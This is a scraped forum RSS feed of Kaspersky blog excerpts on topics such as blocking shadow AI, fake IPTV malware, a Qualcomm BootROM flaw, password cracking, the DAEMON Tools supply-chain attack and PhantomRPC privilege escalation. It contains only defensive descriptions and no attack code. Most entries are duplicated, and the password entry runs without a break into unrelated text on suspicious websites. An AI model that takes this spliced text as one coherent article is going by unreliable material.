<![CDATA[Geeks for your information - Kaspersky Security Blog]]>

<![CDATA[Geeks for your information - Kaspersky Security Blog]]> https://www.geeks.fyi/ Fri, 19 Jun 2026 18:23:59 +0000 MyBB <![CDATA[Taming shadow-AI on corporate devices]]> https://www.geeks.fyi/showthread.php?tid=22055 Thu, 11 Jun 2026 10:57:01 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=22055 Quote:How to detect and block unauthorized AI tools in an organization.

Unchecked AI in the workplace quickly becomes a massive loophole for data leaks and security breaches. All too often, employees drop sensitive company data into public chatbots, or install rogue AI assistants on their own — in the process handing over way too much access. In a previous post, we broke down the different types of risky AI systems, and later shared some tips on how to turn off the built-in AI features on major tech platforms. Today let’s take a look at practical ways to block or restrict the unauthorized “helpers” employees might be using — from ChatGPT and Grammarly, to meeting bots like Fireflies and Read AI.

How to detect and restrict ChatGPT

ChatGPT is the biggest culprit when it comes to unauthorized AI use worldwide. A quick word of warning, though: an outright ban only sends users hunting for sketchy third-party sites or messaging app chatbots that hook into the same service. That’s why it’s always a good idea to offer an approved alternative before pulling the plug.

Detecting it: keep an eye on the NGFW or web filter for traffic heading to chat.openai.com, chatgpt.com, oaistatic.com, oaiusercontent.com, or cdn.oaistatic.com. It’s also smart to use EDR/EPP tools to scan browser histories, installed apps, and browser extensions across corporate devices.

Locking it down: use the firewall or web filter to block the entire AI Services category, and set up DNS to reroute traffic away from those OpenAI domains. Browser policies can also be used to ban ChatGPT-powered extensions. Better yet, block all extensions not on a pre-approved allowlist. Finally, use application controls and EPP solutions to stop users from installing the official desktop app (ChatGPT.exe or com.openai.chat).

Continue Reading... ]]> Quote:How to detect and block unauthorized AI tools in an organization.

Unchecked AI in the workplace quickly becomes a massive loophole for data leaks and security breaches. All too often, employees drop sensitive company data into public chatbots, or install rogue AI assistants on their own — in the process handing over way too much access. In a previous post, we broke down the different types of risky AI systems, and later shared some tips on how to turn off the built-in AI features on major tech platforms. Today let’s take a look at practical ways to block or restrict the unauthorized “helpers” employees might be using — from ChatGPT and Grammarly, to meeting bots like Fireflies and Read AI.

How to detect and restrict ChatGPT

ChatGPT is the biggest culprit when it comes to unauthorized AI use worldwide. A quick word of warning, though: an outright ban only sends users hunting for sketchy third-party sites or messaging app chatbots that hook into the same service. That’s why it’s always a good idea to offer an approved alternative before pulling the plug.

Detecting it: keep an eye on the NGFW or web filter for traffic heading to chat.openai.com, chatgpt.com, oaistatic.com, oaiusercontent.com, or cdn.oaistatic.com. It’s also smart to use EDR/EPP tools to scan browser histories, installed apps, and browser extensions across corporate devices.

Locking it down: use the firewall or web filter to block the entire AI Services category, and set up DNS to reroute traffic away from those OpenAI domains. Browser policies can also be used to ban ChatGPT-powered extensions. Better yet, block all extensions not on a pre-approved allowlist. Finally, use application controls and EPP solutions to stop users from installing the official desktop app (ChatGPT.exe or com.openai.chat).

Continue Reading... ]]> <![CDATA[Don’t let fake IPTV apps ruin your World Cup]]> https://www.geeks.fyi/showthread.php?tid=22011 Sat, 30 May 2026 07:59:59 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=22011 Quote:We break down how cybercriminals are using fake IPTV apps to spread malware, and how you can protect your devices and data during the World Cup.

Threat actors are already gearing up for this year’s biggest football (soccer) event, the FIFA World Cup 2026. With millions of fans looking for ways to stream matches online, many will turn to IPTV apps to watch live TV broadcasts over the internet. It’s no surprise, then, that cybersecurity researchers have discovered multiple campaigns over the past few months where malware was disguised as fake Android IPTV apps.

In this post, we discuss what IPTV apps are, how criminals use fake versions to spread malware, what this malware is capable of, and, most importantly, how to avoid becoming a victim.

What are IPTV apps?

IPTV stands for Internet Protocol Television. This technology delivers TV content over the internet instead of through cable, over-the-air antennas, or satellites. Naturally, the simplest and most common examples of IPTV are the official platforms of TV networks, which can include both websites and dedicated apps.

However, alongside official options, pirate IPTV services also exist. They usually lure users with free or dirt-cheap access to content that can otherwise be hard to find without expensive subscriptions — most notably broadcasts of various sporting events; football matches in particular.

As is typically the case with pirated content, these apps are blocked from official app stores, forcing users to download them from third-party sites. Consequently, the risk of using these services isn’t tied to IPTV technology itself, but rather to the fake apps and modified APK files distributed under the guise of well-known platforms — both official and pirated.

Continue Reading... ]]> Quote:We break down how cybercriminals are using fake IPTV apps to spread malware, and how you can protect your devices and data during the World Cup.

Threat actors are already gearing up for this year’s biggest football (soccer) event, the FIFA World Cup 2026. With millions of fans looking for ways to stream matches online, many will turn to IPTV apps to watch live TV broadcasts over the internet. It’s no surprise, then, that cybersecurity researchers have discovered multiple campaigns over the past few months where malware was disguised as fake Android IPTV apps.

In this post, we discuss what IPTV apps are, how criminals use fake versions to spread malware, what this malware is capable of, and, most importantly, how to avoid becoming a victim.

What are IPTV apps?

IPTV stands for Internet Protocol Television. This technology delivers TV content over the internet instead of through cable, over-the-air antennas, or satellites. Naturally, the simplest and most common examples of IPTV are the official platforms of TV networks, which can include both websites and dedicated apps.

However, alongside official options, pirate IPTV services also exist. They usually lure users with free or dirt-cheap access to content that can otherwise be hard to find without expensive subscriptions — most notably broadcasts of various sporting events; football matches in particular.

As is typically the case with pirated content, these apps are blocked from official app stores, forcing users to download them from third-party sites. Consequently, the risk of using these services isn’t tied to IPTV technology itself, but rather to the fake apps and modified APK files distributed under the guise of well-known platforms — both official and pirated.

Continue Reading... ]]> <![CDATA[Qualcomm vulnerability: phone repairs and car maintenance are no longer safe]]> https://www.geeks.fyi/showthread.php?tid=21993 Sat, 23 May 2026 07:10:49 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21993 Quote:Our experts have discovered an unpatchable vulnerability in Qualcomm chips used everywhere: from smart-home devices, smartphones and cars, to industrial equipment. What risks does it pose, and what can you do to protect yourself?

Imagine handing your smartphone over for repair. A couple of days later, you pick it up — and great, it’s working again! But you won’t even realize that your device has been injected with malicious code, allowing attackers to access your smartphone even when it’s locked.

This is the beginning of the story shared by Kaspersky ICS CERT researchers, Alexander Kozlov and Sergey Anufrienko, at the Black Hat Asia 2026 conference. They managed to uncover a vulnerability that flips conventional assumptions about smartphone and IoT security on their head. Its core lies at the very heart of Qualcomm chips.

What is BootROM?

To grasp the severity of this discovery, we first need to look at how a modern device powered by a Qualcomm chip boots up. Think of it as a fortress with multiple layers of security. Each subsequent layer verifies the pass issued by the previous one. The bedrock foundation — the most trusted layer of them all — is the BootROM, a read-only memory baked directly into the silicon that can’t be modified once it comes off the fab.

The BootROM is the very first thing to run when a device powers on. It verifies the signature of the next bootloader, which in turn verifies the next, building a chain of trust all the way up to the operating system. If an attacker can compromise this chain at the BootROM level, it’s game over: the malicious code will execute before the main operating system even has a chance to load.

This is exactly what attackers can do by exploiting the CVE-2026-25262 vulnerability discovered by Kaspersky ICS CERT researchers.

Continue Reading... ]]> Quote:Our experts have discovered an unpatchable vulnerability in Qualcomm chips used everywhere: from smart-home devices, smartphones and cars, to industrial equipment. What risks does it pose, and what can you do to protect yourself?

Imagine handing your smartphone over for repair. A couple of days later, you pick it up — and great, it’s working again! But you won’t even realize that your device has been injected with malicious code, allowing attackers to access your smartphone even when it’s locked.

This is the beginning of the story shared by Kaspersky ICS CERT researchers, Alexander Kozlov and Sergey Anufrienko, at the Black Hat Asia 2026 conference. They managed to uncover a vulnerability that flips conventional assumptions about smartphone and IoT security on their head. Its core lies at the very heart of Qualcomm chips.

What is BootROM?

To grasp the severity of this discovery, we first need to look at how a modern device powered by a Qualcomm chip boots up. Think of it as a fortress with multiple layers of security. Each subsequent layer verifies the pass issued by the previous one. The bedrock foundation — the most trusted layer of them all — is the BootROM, a read-only memory baked directly into the silicon that can’t be modified once it comes off the fab.

The BootROM is the very first thing to run when a device powers on. It verifies the signature of the next bootloader, which in turn verifies the next, building a chain of trust all the way up to the operating system. If an attacker can compromise this chain at the BootROM level, it’s game over: the malicious code will execute before the main operating system even has a chance to load.

This is exactly what attackers can do by exploiting the CVE-2026-25262 vulnerability discovered by Kaspersky ICS CERT researchers.

Continue Reading... ]]> <![CDATA[Subscription security: how to protect your account, your wallet… and your sanity]]> https://www.geeks.fyi/showthread.php?tid=21982 Wed, 20 May 2026 06:10:49 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21982 Quote:Why subscription owners need to prioritize personal and family cybersecurity.

Have you ever tried to tally up how much you spend on subscriptions each month? Music, movies, gaming, language courses, delivery services, heated seats, and even the ability to chat with the Grok bot directly from your car — there’s a subscription for just about everything now. There’s even a subscription service specifically designed to… track your other subscriptions.

The number of subscriptions varies significantly depending on where you live, but statistically, 78% of adults worldwide have at least one paid subscription, with the average user juggling 5.6 active services. Furthermore, a large portion of these are family plans used by groups of close relatives… and sometimes other people: 37% of users share their subscriptions outside their immediate family.

Because subscription accounts, especially family plans, often contain sensitive personal data, they’ve become a prime target for cybercriminals. Today we look at how to manage your subscriptions securely, avoid having your accounts compromised, and keep from falling for scammers’ latest tricks.

Security of shared accounts and subscriptions

Why would anyone want to hack your subscription? Even if the service only offers entertainment, your account almost certainly contains sensitive information: your name, address, email, phone number, the names of other members, and other personally identifiable information. This data is then sold on the dark web and used for further attacks.

Continue Reading... ]]> Quote:Why subscription owners need to prioritize personal and family cybersecurity.

Have you ever tried to tally up how much you spend on subscriptions each month? Music, movies, gaming, language courses, delivery services, heated seats, and even the ability to chat with the Grok bot directly from your car — there’s a subscription for just about everything now. There’s even a subscription service specifically designed to… track your other subscriptions.

The number of subscriptions varies significantly depending on where you live, but statistically, 78% of adults worldwide have at least one paid subscription, with the average user juggling 5.6 active services. Furthermore, a large portion of these are family plans used by groups of close relatives… and sometimes other people: 37% of users share their subscriptions outside their immediate family.

Because subscription accounts, especially family plans, often contain sensitive personal data, they’ve become a prime target for cybercriminals. Today we look at how to manage your subscriptions securely, avoid having your accounts compromised, and keep from falling for scammers’ latest tricks.

Security of shared accounts and subscriptions

Why would anyone want to hack your subscription? Even if the service only offers entertainment, your account almost certainly contains sensitive information: your name, address, email, phone number, the names of other members, and other personally identifiable information. This data is then sold on the dark web and used for further attacks.

Continue Reading... ]]> <![CDATA[Cracked in under a minute: (nearly) every other password]]> https://www.geeks.fyi/showthread.php?tid=21950 Sun, 10 May 2026 11:44:29 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21950 Quote:We’ve revisited our study on the crackability of real-world passwords leaked on the dark web — originally conducted two years ago. The findings are sobering: nearly every other password can be cracked in under a minute, and three out of five take less than an hour. How can we move away from insecure passwords?

Every year, hundreds of millions of real user passwords leak onto the dark web. We analyzed 231 million unique passwords from dark-web leaks between 2023 and 2026, and the conclusions are bleak: the vast majority are extremely weak. To crack 60% of these passwords, a hacker needs only an hour and a few dollars in their pocket. Furthermore, password cracking is accelerating by the year; in our similar 2024 study, the percentage of vulnerable passwords was lower.

Today we’re looking at just how reliable the average password is (spoiler: not really), and how you can secure your data and accounts using more robust methods. At the same time, we’ll highlight the patterns most commonly found in actual user passwords.

How passwords are cracked

In our previous study, we detailed the methods for storing and cracking passwords, but here’s a quick refresher on the essentials.

These days, passwords are almost never stored in plain text. For instance, if you create an account with the password “Password123!”, the server won’t store it as-is. Instead, the password is hashed using specific algorithms, turning it into a fixed-length string of letters and numbers (a hash) which is what actually stays on the server. For example, here’s what the MD5 hash for “Password123!” looks like:

Code:
2c103f2c4ed1e59c0b4e2e01821770fa

.

Every time the user enters their password, it’s converted into a hash and compared against the one stored on the server; if the hashes match, the password is correct. If an attacker gets their hands on this hash, they have to decrypt it to recover the original password — this is what’s known as “password cracking”. This is typically done using owned or rented GPUs, and several methods can be employed for the crack:

Exhaustive enumeration (brute force). The computer tries every possible combination of characters, calculating the hash for each one. This method is the easiest way to crack short passwords, or those consisting of a single character set (such as digits only).
Rainbow tables. A total nightmare for anyone with a simple password, this is essentially a “phone book” for passwords whose hashes have already been cracked via brute force or smart algorithms. All an attacker has to do is find a matching hash and see which password corresponds to it.
Smart cracking. These algorithms are trained on databases of leaked passwords. They understand the frequency of different character combinations, and run their checks from the most likely to the least popular sequences. They account for dictionary words, character substitutions (a → @ or s → $), and consider common password structures like “dictionary word + number + special character”, while checking hashes against rainbow tables. Combining these methods significantly accelerates the cracking process.

Beyond that, attackers can also intercept passwords in plain text. There are numerous ways to do this, ranging from phishing (where a victim is lured to a fake web page and enters their password voluntarily) and keyloggers that capture keystrokes, to stealers or Trojans that swipe documents, cookies, clipboard data, and more. Unfortunately, many users keep their passwords as plain text in notes, messaging apps, and documents, or save them in browsers where attackers can extract them in seconds.

Continue Reading... ]]> Quote:We’ve revisited our study on the crackability of real-world passwords leaked on the dark web — originally conducted two years ago. The findings are sobering: nearly every other password can be cracked in under a minute, and three out of five take less than an hour. How can we move away from insecure passwords?

Every year, hundreds of millions of real user passwords leak onto the dark web. We analyzed 231 million unique passwords from dark-web leaks between 2023 and 2026, and the conclusions are bleak: the vast majority are extremely weak. To crack 60% of these passwords, a hacker needs only an hour and a few dollars in their pocket. Furthermore, password cracking is accelerating by the year; in our similar 2024 study, the percentage of vulnerable passwords was lower.

Today we’re looking at just how reliable the average password is (spoiler: not really), and how you can secure your data and accounts using more robust methods. At the same time, we’ll highlight the patterns most commonly found in actual user passwords.

How passwords are cracked

In our previous study, we detailed the methods for storing and cracking passwords, but here’s a quick refresher on the essentials.

These days, passwords are almost never stored in plain text. For instance, if you create an account with the password “Password123!”, the server won’t store it as-is. Instead, the password is hashed using specific algorithms, turning it into a fixed-length string of letters and numbers (a hash) which is what actually stays on the server. For example, here’s what the MD5 hash for “Password123!” looks like:

Code:
2c103f2c4ed1e59c0b4e2e01821770fa

Exhaustive enumeration (brute force). The computer tries every possible combination of characters, calculating the hash for each one. This method is the easiest way to crack short passwords, or those consisting of a single character set (such as digits only).
Rainbow tables. A total nightmare for anyone with a simple password, this is essentially a “phone book” for passwords whose hashes have already been cracked via brute force or smart algorithms. All an attacker has to do is find a matching hash and see which password corresponds to it.
Smart cracking. These algorithms are trained on databases of leaked passwords. They understand the frequency of different character combinations, and run their checks from the most likely to the least popular sequences. They account for dictionary words, character substitutions (a → @ or s → $), and consider common password structures like “dictionary word + number + special character”, while checking hashes against rainbow tables. Combining these methods significantly accelerates the cracking process.

A suspicious website is a web resource that cannot be definitively classified as phishing, but whose activities are unsafe. Such sites manipulate users, tricking them into voluntarily transferring money for non-existent services, signing up for hidden subscriptions, or disclosing personal data through carefully crafted terms of service. These include fake online stores, dubious crypto exchanges, investment platforms, and services with paid subscriptions.
Kaspersky has introduced a new web filtering category, “Sites with an undefined trust level,” into its security products (Kaspersky Premium, Android and iOS apps, etc.). The system analyzes the domain name and age, IP address reputation, DNS configuration, HTTP security headers, and SSL certificate to automatically detect suspicious resources.
According to Kaspersky data for January 2026, the most widespread global threat is fake browser extensions that mimic security products — they were detected in 9 out of 10 regions analyzed worldwide. Such extensions intercept browser data, track user activity, hijack search queries, and inject ads.
Kaspersky’s regional statistics reveal the specific nature of these threats: in Africa, over 90% of the top 10 suspicious websites are online trading scam platforms; in Latin America, fake betting services predominate; in Russia, fake binary options brokers and “educational platforms” with fraudulent subscriptions lead the way; in CIS countries — crypto scams and bots for inflating engagement.
Key indicators of a suspicious website to check: a strange domain name with numbers or random characters, cheap top-level domains (.xyz, .top, .shop), a recently registered domain (less than 6 months old according to WHOIS data), unrealistic promises (“100% guaranteed income,” “up to 300% profit”), lack of company contact information, and payments only via cryptocurrency or irreversible bank transfers.

A suspicious website is a web resource that cannot be definitively classified as phishing, but whose activities are unsafe. Such sites manipulate users, tricking them into voluntarily transferring money for non-existent services, signing up for hidden subscriptions, or disclosing personal data through carefully crafted terms of service. These include fake online stores, dubious crypto exchanges, investment platforms, and services with paid subscriptions.
Kaspersky has introduced a new web filtering category, “Sites with an undefined trust level,” into its security products (Kaspersky Premium, Android and iOS apps, etc.). The system analyzes the domain name and age, IP address reputation, DNS configuration, HTTP security headers, and SSL certificate to automatically detect suspicious resources.
According to Kaspersky data for January 2026, the most widespread global threat is fake browser extensions that mimic security products — they were detected in 9 out of 10 regions analyzed worldwide. Such extensions intercept browser data, track user activity, hijack search queries, and inject ads.
Kaspersky’s regional statistics reveal the specific nature of these threats: in Africa, over 90% of the top 10 suspicious websites are online trading scam platforms; in Latin America, fake betting services predominate; in Russia, fake binary options brokers and “educational platforms” with fraudulent subscriptions lead the way; in CIS countries — crypto scams and bots for inflating engagement.
Key indicators of a suspicious website to check: a strange domain name with numbers or random characters, cheap top-level domains (.xyz, .top, .shop), a recently registered domain (less than 6 months old according to WHOIS data), unrealistic promises (“100% guaranteed income,” “up to 300% profit”), lack of company contact information, and payments only via cryptocurrency or irreversible bank transfers.

Introduction

The online landscape is filled with various traps lying in wait for users. One such threat involves websites that can’t be strictly classified as phishing, yet whose activities are inherently unsafe. These sites often operate on the fringes of the law, even if they aren’t directly violating it. Sometimes they use a cleverly crafted Terms of Service document as a loophole. These agreements might include clauses such as no-refund policies or forced automatic subscription renewals.

Continue Reading... ]]> <![CDATA[DAEMON Tools software infected – supply chain attack ongoing since April 8, 2026]]> https://www.geeks.fyi/showthread.php?tid=21939 Tue, 05 May 2026 11:35:49 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21939 Quote:What happened?

In early May 2026, we identified installers of the DAEMON Tools software, used for mounting disk images, to be compromised with a malicious payload. These installers are distributed from the legitimate website of DAEMON Tools and are signed with digital certificates belonging to DAEMON Tools developers. Our analysis revealed that the software installers have been trojanized starting from April 8, 2026. Specifically, we identified versions of DAEMON Tools ranging from 12.5.0.2421 to 12.5.0.2434 to be compromised. At the time of writing this article, the supply chain attack is still active. Artifacts suggesting that the threat actor behind this attack is Chinese-speaking have been identified in the malicious implants observed. We contacted AVB Disc Soft, the developer company of DAEMON Tools, so that further actions could be taken to remediate the attack consequences.

Starting from early April, we observed several thousands of infection attempts involving DAEMON Tools in our telemetry, with individuals and organizations in more than 100 countries being affected. However, out of all the machines infected, we have observed further-stage payloads being deployed to only a dozen of them. These machines that received further payloads belonged to retail, scientific, government and manufacturing organizations – and this indicates that the supply chain attack has a targeted manner.

Kaspersky solutions protect its users from the malicious payloads deployed through the DAEMON Tools supply chain attack.

Trojanized binaries

Our analysis revealed that for DAEMON Tools versions from 12.5.0.2421 to 12.5.0.2434, attackers have managed to compromise the following binaries inside the software installations:

DTHelper.exe
DiscSoftBusServiceLite.exe
DTShellHlp.exe

These files are located in the directory where DAEMON Tools is installed, for example

Code:
C:\Program Files\DAEMON Tools Lite

. Notably, these files are digitally signed by the developer of DAEMON Tools, AVB Disc Soft.

Continue Reading... ]]> Quote:What happened?

In early May 2026, we identified installers of the DAEMON Tools software, used for mounting disk images, to be compromised with a malicious payload. These installers are distributed from the legitimate website of DAEMON Tools and are signed with digital certificates belonging to DAEMON Tools developers. Our analysis revealed that the software installers have been trojanized starting from April 8, 2026. Specifically, we identified versions of DAEMON Tools ranging from 12.5.0.2421 to 12.5.0.2434 to be compromised. At the time of writing this article, the supply chain attack is still active. Artifacts suggesting that the threat actor behind this attack is Chinese-speaking have been identified in the malicious implants observed. We contacted AVB Disc Soft, the developer company of DAEMON Tools, so that further actions could be taken to remediate the attack consequences.

DTHelper.exe
DiscSoftBusServiceLite.exe
DTShellHlp.exe

These files are located in the directory where DAEMON Tools is installed, for example

Code:
C:\Program Files\DAEMON Tools Lite

. Notably, these files are digitally signed by the developer of DAEMON Tools, AVB Disc Soft.

Continue Reading... ]]> <![CDATA[Is your car spying on you?]]> https://www.geeks.fyi/showthread.php?tid=21932 Thu, 30 Apr 2026 08:14:47 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21932 Quote:How law enforcement and intelligence agencies leverage data from connected vehicles, and what your car might be leaking about you.

It’s best to think of the modern car as a computer on wheels — one that constantly offloads diagnostic data to the manufacturer or dealer’s servers. On board, you’ll find dozens of sensors: everything from GPS, speedometers, and hands-free microphones, to external cameras and the less obvious (but highly active) sensors for pedal pressure, tire pressure, engine temperature, and more. Even if this data isn’t beamed to the manufacturer in real-time, it’s logged in the car’s internal memory, and can reveal a wealth of information about a driver’s trips, habits, and surroundings. We’ve already taken a deep dive into how automakers collect data for commercial use, and who they sell it to (spoiler alert: insurance companies are the biggest buyers of telemetry), but today we’re looking at how law enforcement and intelligence agencies tap into this goldmine.

Digital evidence

Police departments across the globe have recognized the immense value of data stored within vehicles. If a car or its owner is potentially linked to a crime, investigators do more than just check for prints or DNA. Car Intelligence (CARINT) technology allows them to essentially scour all onboard computers, extracting data such as:

GPS-based trip history
Call logs, media player activity, and voice commands
Lists of paired devices and synced contact lists
Driving statistics: mileage, engine performance modes, and other technical parameters

GPS-based trip history
Call logs, media player activity, and voice commands
Lists of paired devices and synced contact lists
Driving statistics: mileage, engine performance modes, and other technical parameters

There are numerous precedents where this data has served as evidence and dismantled alibis. In one U.S. criminal case, a recorded voice command became a smoking gun, proving the suspect was behind the wheel of a stolen vehicle.

With the rise of connected cars equipped with their own SIM cards and direct links to the manufacturer, law enforcement no longer needs physical access to the vehicle. Key data, such as GPS location history, can be pulled directly from the manufacturer’s servers. Furthermore, a U.S. Senate investigation revealed that nine out of 14 surveyed automakers were providing this data without a warrant.

Major suppliers of car intelligence software, such as Ateros, Berla, TA9/Rayzone, and Toka, sell their solutions exclusively to government and law enforcement agencies, which is why they’ve remained largely out of the public eye.

Continue Reading... ]]> <![CDATA[PhantomRPC: A new privilege escalation technique in Windows RPC]]> https://www.geeks.fyi/showthread.php?tid=21907 Fri, 24 Apr 2026 10:53:40 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21907 Quote:Intro

Windows Interprocess Communication (IPC) is one of the most complex technologies within the Windows operating system. At the core of this ecosystem is the Remote Procedure Call (RPC) mechanism, which can function as a standalone communication channel or as the underlying transport layer for more advanced interprocess communication technologies. Because of its complexity and widespread use, RPC has historically been a rich source of security issues. Over the years, researchers have identified numerous vulnerabilities in services that rely on RPC, ranging from local privilege escalation to full remote code execution.

In this research, I present a new vulnerability in the RPC architecture that enables a novel local privilege escalation technique in all Windows versions. This technique enables processes with impersonation privileges to elevate their permissions to SYSTEM level. Although this vulnerability differs fundamentally from the “Potato” exploit family, Microsoft has not issued a patch despite proper disclosure.

I will demonstrate five different exploitation paths that show how privileges can be escalated from various local or network service contexts to SYSTEM or high-privileged users. Some techniques rely on coercion, some require user interaction and some take advantage of background services. As this issue stems from an architectural weakness, the number of potential attack vectors is effectively unlimited; any new process or service that depends on RPC could introduce another possible escalation path. For this reason, I also outline a methodology for identifying such opportunities.

Finally, I examine possible detection strategies, as well as defensive approaches that can help mitigate such attacks.

MSRPC

Microsoft RPC (Remote Procedure Call) is a Windows technology that enables communication between two processes. It enables one process to invoke functions that are implemented in another process, even though they are running in different execution contexts.

Continue Reading... ]]> Quote:Intro

Windows Interprocess Communication (IPC) is one of the most complex technologies within the Windows operating system. At the core of this ecosystem is the Remote Procedure Call (RPC) mechanism, which can function as a standalone communication channel or as the underlying transport layer for more advanced interprocess communication technologies. Because of its complexity and widespread use, RPC has historically been a rich source of security issues. Over the years, researchers have identified numerous vulnerabilities in services that rely on RPC, ranging from local privilege escalation to full remote code execution.

In this research, I present a new vulnerability in the RPC architecture that enables a novel local privilege escalation technique in all Windows versions. This technique enables processes with impersonation privileges to elevate their permissions to SYSTEM level. Although this vulnerability differs fundamentally from the “Potato” exploit family, Microsoft has not issued a patch despite proper disclosure.

I will demonstrate five different exploitation paths that show how privileges can be escalated from various local or network service contexts to SYSTEM or high-privileged users. Some techniques rely on coercion, some require user interaction and some take advantage of background services. As this issue stems from an architectural weakness, the number of potential attack vectors is effectively unlimited; any new process or service that depends on RPC could introduce another possible escalation path. For this reason, I also outline a methodology for identifying such opportunities.

Finally, I examine possible detection strategies, as well as defensive approaches that can help mitigate such attacks.

MSRPC

Microsoft RPC (Remote Procedure Call) is a Windows technology that enables communication between two processes. It enables one process to invoke functions that are implemented in another process, even though they are running in different execution contexts.

Continue Reading... ]]> <![CDATA[The iPhone — invincible no more: a look at DarkSword and Coruna]]> https://www.geeks.fyi/showthread.php?tid=21855 Sat, 18 Apr 2026 06:28:19 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21855 Quote:The emergence of DarkSword and Coruna — new malware targeting iOS — shows exactly how government intelligence tools are being repurposed as weapons for cybercriminals. We break down how these attacks work, why they’re so dangerous, and what you can do to not get infected.

DarkSword and Coruna are two new tools for invisible attacks on iOS devices. These attacks require no user interaction and are already being actively used by bad actors in the wild. Before these threats emerged, most iPhone users didn’t have to lose sleep over their data security. Protection was really only a major concern for a narrow group — politicians, activists, diplomats, high-level business execs, and others who handle extremely sensitive data — who might be targeted by foreign intelligence agencies. We’ve covered sophisticated spyware used against such a group before — noting how hard to come by those tools were.

However, DarkSword and Coruna — discovered by researchers earlier this year — are total game-changers. This malware is being used for mass infections of everyday users. In this post, we dive into why this shift happened, why these tools are so dangerous, and how you can stay protected.

What we know about DarkSword, and how it can target your iPhone

In mid-March 2026, three separate research teams coordinated the release of their findings on a new spyware strain called DarkSword. This tool is capable of silently hacking devices running iOS 18 without the user ever knowing something is wrong.

First, we should clear up some confusion: iOS 18 isn’t as vintage as it might sound. Even though the latest version is iOS 26, Apple recently overhauled its versioning system, which threw everyone for a loop. They decided to jump ahead eight versions — from 18 straight to 26 — so the OS number matches the current year. Despite the jump, Apple estimates that about a quarter of all active devices still run iOS 18 or older.

Continue Reading... ]]> Quote:The emergence of DarkSword and Coruna — new malware targeting iOS — shows exactly how government intelligence tools are being repurposed as weapons for cybercriminals. We break down how these attacks work, why they’re so dangerous, and what you can do to not get infected.

DarkSword and Coruna are two new tools for invisible attacks on iOS devices. These attacks require no user interaction and are already being actively used by bad actors in the wild. Before these threats emerged, most iPhone users didn’t have to lose sleep over their data security. Protection was really only a major concern for a narrow group — politicians, activists, diplomats, high-level business execs, and others who handle extremely sensitive data — who might be targeted by foreign intelligence agencies. We’ve covered sophisticated spyware used against such a group before — noting how hard to come by those tools were.

However, DarkSword and Coruna — discovered by researchers earlier this year — are total game-changers. This malware is being used for mass infections of everyday users. In this post, we dive into why this shift happened, why these tools are so dangerous, and how you can stay protected.

What we know about DarkSword, and how it can target your iPhone

In mid-March 2026, three separate research teams coordinated the release of their findings on a new spyware strain called DarkSword. This tool is capable of silently hacking devices running iOS 18 without the user ever knowing something is wrong.

First, we should clear up some confusion: iOS 18 isn’t as vintage as it might sound. Even though the latest version is iOS 26, Apple recently overhauled its versioning system, which threw everyone for a loop. They decided to jump ahead eight versions — from 18 straight to 26 — so the OS number matches the current year. Despite the jump, Apple estimates that about a quarter of all active devices still run iOS 18 or older.

Continue Reading... ]]> <![CDATA[What happens in the bedroom stays in the bedroom]]> https://www.geeks.fyi/showthread.php?tid=21811 Mon, 13 Apr 2026 11:20:10 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21811 Quote:Smart sex toys and their companion apps collect and process some extremely personal data. We break down the risks involved, and ways to protect your privacy.

The smart-home craze has connected everything — from your lightbulbs to your tea kettle — to the internet, and the adult industry isn’t sitting this one out: manufacturers are releasing more smart models than ever. While syncing a sex toy to your smartphone unlocks some cool extra features, it also opens the door to potential security and privacy headaches. The good news? You can significantly lower most of these risks just by tweaking your settings and adjusting your usage habits.

How sex-toy apps actually work

To be clear upfront, while researchers have successfully hijacked sex toys in controlled experiments, the odds of a hacker remotely taking over your vibrator in the real world are pretty slim. In this post, we focus on the more realistic risks: your privacy and the safety of your data.

Most modern adult toys link up with the manufacturer’s app. These apps offer a range of usage options: you can control the device yourself, or hand over the remote to a partner — anywhere in the world via the internet.

Beyond just basic controls, many of these apps have social features: private messaging, group chats, calls, and even video sessions. In fact, you don’t even need a physical device to use some of them; you just create an account. Because of this, some of these services have essentially evolved into niche dating platforms.

The toy and your phone talk to each other via Bluetooth — with minimal risks. To handle social features or remote control, the app connects to a cloud server. This creates a constant stream of data moving back and forth: everything from commands to private messages.

Here’s the catch: even if you only use the app to control your toy locally via Bluetooth, you still get connected to that cloud server. That means you’re inheriting all the security and privacy risks.

Continue Reading... ]]> Quote:Smart sex toys and their companion apps collect and process some extremely personal data. We break down the risks involved, and ways to protect your privacy.

The smart-home craze has connected everything — from your lightbulbs to your tea kettle — to the internet, and the adult industry isn’t sitting this one out: manufacturers are releasing more smart models than ever. While syncing a sex toy to your smartphone unlocks some cool extra features, it also opens the door to potential security and privacy headaches. The good news? You can significantly lower most of these risks just by tweaking your settings and adjusting your usage habits.

How sex-toy apps actually work

To be clear upfront, while researchers have successfully hijacked sex toys in controlled experiments, the odds of a hacker remotely taking over your vibrator in the real world are pretty slim. In this post, we focus on the more realistic risks: your privacy and the safety of your data.

Most modern adult toys link up with the manufacturer’s app. These apps offer a range of usage options: you can control the device yourself, or hand over the remote to a partner — anywhere in the world via the internet.

Beyond just basic controls, many of these apps have social features: private messaging, group chats, calls, and even video sessions. In fact, you don’t even need a physical device to use some of them; you just create an account. Because of this, some of these services have essentially evolved into niche dating platforms.

The toy and your phone talk to each other via Bluetooth — with minimal risks. To handle social features or remote control, the app connects to a cloud server. This creates a constant stream of data moving back and forth: everything from commands to private messages.

Here’s the catch: even if you only use the app to control your toy locally via Bluetooth, you still get connected to that cloud server. That means you’re inheriting all the security and privacy risks.

Continue Reading... ]]> <![CDATA[A laughing RAT: CrystalX combines spyware, stealer, and prankware features]]> https://www.geeks.fyi/showthread.php?tid=21704 Wed, 01 Apr 2026 07:19:11 +0000 harlan4096]]> https://www.geeks.fyi/showthread.php?tid=21704 Quote:Introduction

